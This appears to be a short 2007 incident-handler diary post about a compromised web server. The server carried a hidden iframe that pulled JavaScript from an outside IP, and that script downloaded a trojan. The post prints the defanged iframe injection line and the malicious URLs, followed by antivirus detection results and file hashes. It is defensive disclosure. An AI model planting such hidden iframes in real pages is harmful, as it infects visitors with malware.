Iframe > malicious javascript > trojan

Published: 2007-06-05
Last Updated: 2007-06-05 17:27:01 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)

Another iframe on a compromised server pointing to javascript which then downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this:

<bo dy><i frame src='hxxp:// 81.95.149.28/logo/ index.php' width='1' height='1' style='visibility: hidden;'></i frame>

The unencode javascript at 81.95.149.28/logo/ index.php then downloaded and ran hxxp:// 81.95.149.28/logo/ file.php , a binary PE trojan.

Here is what virstotal had to say about file.php:


AntiVir 7.4.0.32 06.05.2007 TR/Small.MI.25
AVG 7.5.0.467 06.05.2007 Generic4.SJO
BitDefender 7.2 06.05.2007 Trojan.Agent.AXB
DrWeb 4.33 06.05.2007 Trojan.DownLoader.23162
eSafe 7.0.15.0 06.05.2007 Win32.Small.mi
eTrust-Vet 30.7.3693 06.05.2007 Win32/Chepvil!generic
Ewido 4.0 06.05.2007 Trojan.Small.mi
F-Secure 6.70.13030.0 06.05.2007 Trojan.Win32.Small.mi
Ikarus T3.1.1.8 06.05.2007 Trojan.Win32.Small.mi
Kaspersky 4.0.2.24 06.05.2007 Trojan.Win32.Small.mi
Microsoft 1.2503 06.05.2007 TrojanDownloader:Win32/Agent!EF3C
Norman 5.80.02 06.05.2007 W32/Smalltroj.BHMK
Prevx1 V2 06.05.2007 Polynomial.Code.Exploit
Sophos 4.18.0 06.01.2007 Mal/Clagger-E
TheHacker 6.1.6.129 06.04.2007 Trojan/Small.mi
VirusBuster 4.3.23:9 06.05.2007 no virus found
Webwasher-Gateway 6.0.1 06.05.2007 Trojan.Small.MI.25

Aditional Information
File size: 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113

The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and infecting web users. If you are notified that a system you run or own is involved in an incident please take action as soon as you can.

Cheers,
Adrien
Keywords:
0 comment(s)

Comments


Diary Archives